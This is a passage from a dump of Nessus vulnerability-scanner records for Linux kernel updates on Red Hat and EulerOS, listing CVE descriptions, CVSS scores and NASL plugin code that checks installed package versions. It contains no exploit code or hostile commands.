{'reference':'kernel-devel-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-kdump-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-kdump-devel-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-tools-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-tools-libs-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'kernel-tools-libs-devel-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'perf-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'python-perf-3.10.0-1160.6.1.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']},\n {'reference':'python-perf-3.10.0-1160.6.1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bpftool / kernel / kernel-abi-whitelists / kernel-debug / etc');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:07:03", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - btrfs_root_node in fs/btrfs/ctree.c in the Linux kernel\n through 5.3.12 allows a NULL pointer dereference\n because rcu_dereference(root->node) can be\n zero.(CVE-2019-19036)\n\n - An issue was discovered in the Linux kernel before\n 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a\n reference count is mishandled, aka\n CID-a3e23f719f5c.(CVE-2019-20811)\n\n - In calc_vm_may_flags of ashmem.c, there is a possible\n arbitrary write to shared memory due to a permissions\n bypass. This could lead to local escalation of\n privilege by corrupting memory shared between\n processes, with no additional execution privileges\n needed. User interaction is not needed for\n exploitation. Product: Android Versions: Android kernel\n Android ID: A-142938932(CVE-2020-0009)\n\n - ** DISPUTED ** An issue was discovered in the Linux\n kernel before 5.6. svm_cpu_uninit in arch/x86/kvm/svm.c\n has a memory leak, aka CID-d80b64ff297e. NOTE: third\n parties dispute this issue because it's a one-time leak\n at the boot, the size is negligible, and it can't be\n triggered at will.(CVE-2020-12768)\n\n - ** DISPUTED ** An issue was discovered in the Linux\n kernel through 5.7.1. drivers/tty/vt/keyboard.c has an\n integer overflow if k_ascii is called several times in\n a row, aka CID-b86dab054059. NOTE: Members in the\n community argue that the integer overflow does not lead\n to a security issue in this case.(CVE-2020-13974)\n\n - In the Linux kernel through 5.7.6, usbtest_disconnect\n in drivers/usb/misc/usbtest.c has a memory leak, aka\n CID-28ebeb8db770.(CVE-2020-15393)\n\n - A NULL pointer dereference flaw was found in the Linux\n kernel's SELinux subsystem in versions before 5.7. This\n flaw occurs while importing the Commercial IP Security\n Option (CIPSO) protocol's category bitmap into the\n SELinux extensible bitmap via the'\n ebitmap_netlbl_import' routine. While processing the\n CIPSO restricted bitmap tag in the\n 'cipso_v4_parsetag_rbm' routine, it sets the security\n attribute to indicate that the category bitmap is\n present, even if it has not been allocated. This issue\n leads to a NULL pointer dereference issue while\n importing the same category bitmap into SELinux. This\n flaw allows a remote network user to crash the system\n kernel, resulting in a denial of service(\n CVE-2020-10711)\n\n - A flaw was found in the Linux kernel's implementation\n of Userspace core dumps. This flaw allows an attacker\n with a local account to crash a trivial program and\n exfiltrate private kernel data.(CVE-2020-10732)\n\n - A flaw was found in the Linux kernels SELinux LSM hook\n implementation before version 5.7, where it incorrectly\n assumed that an skb would only contain a single netlink\n message. The hook would incorrectly only validate the\n first netlink message in the skb and allow or deny the\n rest of the messages within the skb with the granted\n permission without further processing.(CVE-2020-10751)\n\n - A buffer over-read flaw was found in RH kernel versions\n before 5.0 in crypto_authenc_extractkeys in\n crypto/authenc.c in the IPsec Cryptographic algorithm's\n module, authenc. When a payload longer than 4 bytes,\n and is not following 4-byte alignment boundary\n guidelines, it causes a buffer over-read threat,\n leading to a system crash. This flaw allows a local\n attacker with user privileges to cause a denial of\n service.(CVE-2020-10769)\n\n - In the Linux kernel before 5.7.8, fs/nfsd/vfs.c (in the\n NFS server) can set incorrect permissions on new\n filesystem objects when the filesystem lacks ACL\n support, aka CID-22cf8419f131. This occurs because the\n current umask is not considered.(CVE-2020-24394)\n\n - The Linux kernel through 5.7.11 allows remote attackers\n to make observations that help to obtain sensitive\n information about the internal state of the network\n RNG, aka CID-f227e3ec3b5c. This is related to\n drivers/char/random.c and\n kernel/time/timer.c.(CVE-2020-16166)\n\n - A flaw was found in the Linux kernel's implementation\n of GRO in versions before 5.2. This flaw allows an\n attacker with local access to crash the\n system.(CVE-2020-10720)\n\n - In the Linux kernel through 5.8.7, local attackers able\n to inject conntrack netlink configuration could\n overflow a local buffer, causing crashes or triggering\n use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter in\n net/netfilter/nf_conntrack_netlink.c, aka\n CID-1cc5ef91d2ff.(CVE-2020-25211)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-06T00:00:00", "title": "EulerOS Virtualization 3.0.6.6 : kernel (EulerOS-SA-2020-2443)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10711", "CVE-2020-16166", "CVE-2020-12768", "CVE-2020-24394", "CVE-2020-10720", "CVE-2020-10732", "CVE-2020-0009", "CVE-2020-10769", "CVE-2020-15393", "CVE-2020-25211", "CVE-2019-19036", "CVE-2020-10751", "CVE-2020-13974", "CVE-2019-20811"], "modified": "2020-11-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.6.6", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2020-2443.NASL", "href": "https://www.tenable.com/plugins/nessus/142576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142576);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2019-19036\",\n \"CVE-2019-20811\",\n \"CVE-2020-0009\",\n \"CVE-2020-10711\",\n \"CVE-2020-10720\",\n \"CVE-2020-10732\",\n \"CVE-2020-10751\",\n \"CVE-2020-10769\",\n \"CVE-2020-12768\",\n \"CVE-2020-13974\",\n \"CVE-2020-15393\",\n \"CVE-2020-16166\",\n \"CVE-2020-24394\",\n \"CVE-2020-25211\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.6.6 : kernel (EulerOS-SA-2020-2443)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - btrfs_root_node in fs/btrfs/ctree.c in the Linux kernel\n through 5.3.12 allows a NULL pointer dereference\n because rcu_dereference(root->node) can be\n zero.(CVE-2019-19036)\n\n - An issue was discovered in the Linux kernel before\n 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a\n reference count is mishandled, aka\n CID-a3e23f719f5c.(CVE-2019-20811)\n\n - In calc_vm_may_flags of ashmem.c, there is a possible\n arbitrary write to shared memory due to a permissions\n bypass. This could lead to local escalation of\n privilege by corrupting memory shared between\n processes, with no additional execution privileges\n needed. User interaction is not needed for\n exploitation. Product: Android Versions: Android kernel\n Android ID: A-142938932(CVE-2020-0009)\n\n - ** DISPUTED ** An issue was discovered in the Linux\n kernel before 5.6. svm_cpu_uninit in arch/x86/kvm/svm.c\n has a memory leak, aka CID-d80b64ff297e. NOTE: third\n parties dispute this issue because it's a one-time leak\n at the boot, the size is negligible, and it can't be\n triggered at will.(CVE-2020-12768)\n\n - ** DISPUTED ** An issue was discovered in the Linux\n kernel through 5.7.1. drivers/tty/vt/keyboard.c has an\n integer overflow if k_ascii is called several times in\n a row, aka CID-b86dab054059. NOTE: Members in the\n community argue that the integer overflow does not lead\n to a security issue in this case.(CVE-2020-13974)\n\n - In the Linux kernel through 5.7.6, usbtest_disconnect\n in drivers/usb/misc/usbtest.c has a memory leak, aka\n CID-28ebeb8db770.(CVE-2020-15393)\n\n - A NULL pointer dereference flaw was found in the Linux\n kernel's SELinux subsystem in versions before 5.7. This\n flaw occurs while importing the Commercial IP Security\n Option (CIPSO) protocol's category bitmap into the\n SELinux extensible bitmap via the'\n ebitmap_netlbl_import' routine. While processing the\n CIPSO restricted bitmap tag in the\n 'cipso_v4_parsetag_rbm' routine, it sets the security\n attribute to indicate that the category bitmap is\n present, even if it has not been allocated. This issue\n leads to a NULL pointer dereference issue while\n importing the same category bitmap into SELinux. This\n flaw allows a remote network user to crash the system\n kernel, resulting in a denial of service(\n CVE-2020-10711)\n\n - A flaw was found in the Linux kernel's implementation\n of Userspace core dumps. This flaw allows an attacker\n with a local account to crash a trivial program and\n exfiltrate private kernel data.(CVE-2020-10732)\n\n - A flaw was found in the Linux kernels SELinux LSM hook\n implementation before version 5.7, where it incorrectly\n assumed that an skb would only contain a single netlink\n message. The hook would incorrectly only validate the\n first netlink message in the skb and allow or deny the\n rest of the messages within the skb with the granted\n permission without further processing.(CVE-2020-10751)\n\n - A buffer over-read flaw was found in RH kernel versions\n before 5.0 in crypto_authenc_extractkeys in\n crypto/authenc.c in the IPsec Cryptographic algorithm's\n module, authenc. When a payload longer than 4 bytes,\n and is not following 4-byte alignment boundary\n guidelines, it causes a buffer over-read threat,\n leading to a system crash. This flaw allows a local\n attacker with user privileges to cause a denial of\n service.(CVE-2020-10769)\n\n - In the Linux kernel before 5.7.8, fs/nfsd/vfs.c (in the\n NFS server) can set incorrect permissions on new\n filesystem objects when the filesystem lacks ACL\n support, aka CID-22cf8419f131. This occurs because the\n current umask is not considered.(CVE-2020-24394)\n\n - The Linux kernel through 5.7.11 allows remote attackers\n to make observations that help to obtain sensitive\n information about the internal state of the network\n RNG, aka CID-f227e3ec3b5c. This is related to\n drivers/char/random.c and\n kernel/time/timer.c.(CVE-2020-16166)\n\n - A flaw was found in the Linux kernel's implementation\n of GRO in versions before 5.2. This flaw allows an\n attacker with local access to crash the\n system.(CVE-2020-10720)\n\n - In the Linux kernel through 5.8.7, local attackers able\n to inject conntrack netlink configuration could\n overflow a local buffer, causing crashes or triggering\n use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter in\n net/netfilter/nf_conntrack_netlink.c, aka\n CID-1cc5ef91d2ff.(CVE-2020-25211)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2443\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?031994d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_117\",\n \"kernel-devel-3.10.0-862.14.1.6_117\",\n \"kernel-headers-3.10.0-862.14.1.6_117\",\n \"kernel-tools-3.10.0-862.14.1.6_117\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_117\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_117\",\n \"perf-3.10.0-862.14.1.6_117\",\n \"python-perf-3.10.0-862.14.1.6_117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:06:53", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel's implementation\n of the invert video code on VGA consoles when a local\n attacker attempts to resize the console, calling an\n ioctl VT_RESIZE, which causes an out-of-bounds write to\n occur. This flaw allows a local user with access to the\n VGA console to crash the system, potentially escalating\n their privileges on the system. The highest threat from\n this vulnerability is to data confidentiality and\n integrity as well as system\n availability.(CVE-2020-14331)\n\n - A flaw was found in the HDLC_PPP module of the Linux\n kernel in versions before 5.9-rc7. Memory corruption\n and a read overflow is caused by improper input\n validation in the ppp_cp_parse_cr function which can\n cause the system to crash or cause a denial of service.\n The highest threat from this vulnerability is to data\n confidentiality and integrity as well as system\n availability.(CVE-2020-25643)\n\n - A memory out-of-bounds read flaw was found in the Linux\n kernel before 5.9-rc2 with the ext3/ext4 file system,\n in the way it accesses a directory with broken\n indexing. This flaw allows a local user to crash the\n system if the directory exists. The highest threat from\n this vulnerability is to system\n availability.(CVE-2020-14314)\n\n - A TOCTOU mismatch in the NFS client code in the Linux\n kernel before 5.8.3 could be used by local attackers to\n corrupt memory or possibly have unspecified other\n impact because a size check is in fs/nfs/nfs4proc.c\n instead of fs/nfs/nfs4xdr.c, aka\n CID-b4487b935452.(CVE-2020-25212)\n\n - The rbd block device driver in drivers/block/rbd.c in\n the Linux kernel through 5.8.9 used incomplete\n permission checking for access to rbd devices, which\n could be leveraged by local attackers to map or unmap\n rbd block devices, aka\n CID-f44d04e696fe.(CVE-2020-25284)\n\n - A race condition between hugetlb sysctl handlers in\n mm/hugetlb.c in the Linux kernel before 5.8.8 could be\n used by local attackers to corrupt memory, cause a NULL\n pointer dereference, or possibly have unspecified other\n impact, aka CID-17743798d812.(CVE-2020-25285)\n\n - A flaw was found in the Linux kernel before 5.9-rc4.\n Memory corruption can be exploited to gain root\n privileges from unprivileged processes. The highest\n threat from this vulnerability is to data\n confidentiality and integrity.(CVE-2020-14386)\n\n - A flaw was found in the Linux kernel in versions before\n 5.9-rc6. When changing screen size, an out-of-bounds\n memory write can occur leading to memory corruption or\n a denial of service. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled\n out.(CVE-2020-14390)\n\n - In the Linux kernel through 5.8.7, local attackers able\n to inject conntrack netlink configuration could\n overflow a local buffer, causing crashes or triggering\n use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter in\n net/netfilter/nf_conntrack_netlink.c, aka\n CID-1cc5ef91d2ff.(CVE-2020-25211)\n\n - The VFIO PCI driver in the Linux kernel through 5.6.13\n mishandles attempts to access disabled memory\n space.(CVE-2020-12888)\n\n - The kernel in Red Hat Enterprise Linux 7 and MRG-2 does\n not clear garbage data for SG_IO buffer, which may\n leaking sensitive information to\n userspace.(CVE-2014-8181)\n\n - A flaw was found in the Linux kernels SELinux LSM hook\n implementation before version 5.7, where it incorrectly\n assumed that an skb would only contain a single netlink\n message. The hook would incorrectly only validate the\n first netlink message in the skb and allow or deny the\n rest of the messages within the skb with the granted\n permission without further processing. (CVE-2020-10751)\n\n - The Linux kernel through 5.7.11 allows remote attackers\n to make observations that help to obtain sensitive\n information about the internal state of the network\n RNG, aka CID-f227e3ec3b5c. This is related to\n drivers/char/random.c and\n kernel/time/timer.c.(CVE-2020-16166)\n\n - A buffer over-read flaw was found in RH kernel versions\n before 5.0 in crypto_authenc_extractkeys in\n crypto/authenc.c in the IPsec Cryptographic algorithm's\n module, authenc. When a payload longer than 4 bytes,\n and is not following 4-byte alignment boundary\n guidelines, it causes a buffer over-read threat,\n leading to a system crash. This flaw allows a local\n attacker with user privileges to cause a denial of\n service.(CVE-2020-10769)\n\n - In the Linux kernel through 5.7.6, usbtest_disconnect\n in drivers/usb/misc/usbtest.c has a memory leak, aka\n CID-28ebeb8db770.(CVE-2020-15393)\n\n - An issue was discovered in the Linux kernel through\n 5.7.1. drivers/tty/vt/keyboard.c has an integer\n overflow if k_ascii is called several times in a row,\n aka CID-b86dab054059.(CVE-2020-13974)\n\n - go7007_snd_init in\n drivers/media/usb/go7007/snd-go7007.c in the Linux\n kernel before 5.6 does not call snd_card_free for a\n failure path, which causes a memory leak, aka\n CID-9453264ef586.(CVE-2019-20810)\n\n - An issue was discovered in the Linux kernel before\n 5.0.6. In rx_queue_add_kobject() and\n netdev_queue_add_kobject() in net/core/net-sysfs.c, a\n reference count is mishandled, aka\n CID-a3e23f719f5c.(CVE-2019-20811)\n\n - An issue was discovered in the Linux kernel before\n 5.4.7. The prb_calc_retire_blk_tmo() function in\n net/packet/af_packet.c can result in a denial of\n service (CPU consumption and soft lockup) in a certain\n failure case involving TPACKET_V3, aka\n CID-b43d1f9f7067.(CVE-2019-20812)\n\n - A flaw was found in the Linux kernel's implementation\n of Userspace core dumps. This flaw allows an attacker\n with a local account to crash a trivial program and\n exfiltrate private kernel data.(CVE-2020-10732)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 7.2, "vector": "AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-03T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-2353)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16166", "CVE-2020-12888", "CVE-2020-25285", "CVE-2019-20810", "CVE-2014-8181", "CVE-2020-25643", "CVE-2020-10732", "CVE-2020-10769", "CVE-2020-14331", "CVE-2019-20812", "CVE-2020-15393", "CVE-2020-25211", "CVE-2020-25284", "CVE-2020-10751", "CVE-2020-14386", "CVE-2020-25212", "CVE-2020-14390", "CVE-2020-13974", "CVE-2020-14314", "CVE-2019-20811"], "modified": "2020-11-03T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2353.NASL", "href": "https://www.tenable.com/plugins/nessus/142240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142240);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-8181\",\n \"CVE-2019-20810\",\n \"CVE-2019-20811\",\n \"CVE-2019-20812\",\n \"CVE-2020-10732\",\n \"CVE-2020-10751\",\n \"CVE-2020-10769\",\n \"CVE-2020-12888\",\n \"CVE-2020-13974\",\n \"CVE-2020-14314\",\n \"CVE-2020-14331\",\n \"CVE-2020-14386\",\n \"CVE-2020-14390\",\n \"CVE-2020-15393\",\n \"CVE-2020-16166\",\n \"CVE-2020-25211\",\n \"CVE-2020-25212\",\n \"CVE-2020-25284\",\n \"CVE-2020-25285\",\n \"CVE-2020-25643\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-2353)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel's implementation\n of the invert video code on VGA consoles when a local\n attacker attempts to resize the console, calling an\n ioctl VT_RESIZE, which causes an out-of-bounds write to\n occur. This flaw allows a local user with access to the\n VGA console to crash the system, potentially escalating\n their privileges on the system. The highest threat from\n this vulnerability is to data confidentiality and\n integrity as well as system\n availability.(CVE-2020-14331)\n\n - A flaw was found in the HDLC_PPP module of the Linux\n kernel in versions before 5.9-rc7. Memory corruption\n and a read overflow is caused by improper input\n validation in the ppp_cp_parse_cr function which can\n cause the system to crash or cause a denial of service.\n The highest threat from this vulnerability is to data\n confidentiality and integrity as well as system\n availability.(CVE-2020-25643)\n\n - A memory out-of-bounds read flaw was found in the Linux\n kernel before 5.9-rc2 with the ext3/ext4 file system,\n in the way it accesses a directory with broken\n indexing. This flaw allows a local user to crash the\n system if the directory exists. The highest threat from\n this vulnerability is to system\n availability.(CVE-2020-14314)\n\n - A TOCTOU mismatch in the NFS client code in the Linux\n kernel before 5.8.3 could be used by local attackers to\n corrupt memory or possibly have unspecified other\n impact because a size check is in fs/nfs/nfs4proc.c\n instead of fs/nfs/nfs4xdr.c, aka\n CID-b4487b935452.(CVE-2020-25212)\n\n - The rbd block device driver in drivers/block/rbd.c in\n the Linux kernel through 5.8.9 used incomplete\n permission checking for access to rbd devices, which\n could be leveraged by local attackers to map or unmap\n rbd block devices, aka\n CID-f44d04e696fe.(CVE-2020-25284)\n\n - A race condition between hugetlb sysctl handlers in\n mm/hugetlb.c in the Linux kernel before 5.8.8 could be\n used by local attackers to corrupt memory, cause a NULL\n pointer dereference, or possibly have unspecified other\n impact, aka CID-17743798d812.(CVE-2020-25285)\n\n - A flaw was found in the Linux kernel before 5.9-rc4.\n Memory corruption can be exploited to gain root\n privileges from unprivileged processes. The highest\n threat from this vulnerability is to data\n confidentiality and integrity.(CVE-2020-14386)\n\n - A flaw was found in the Linux kernel in versions before\n 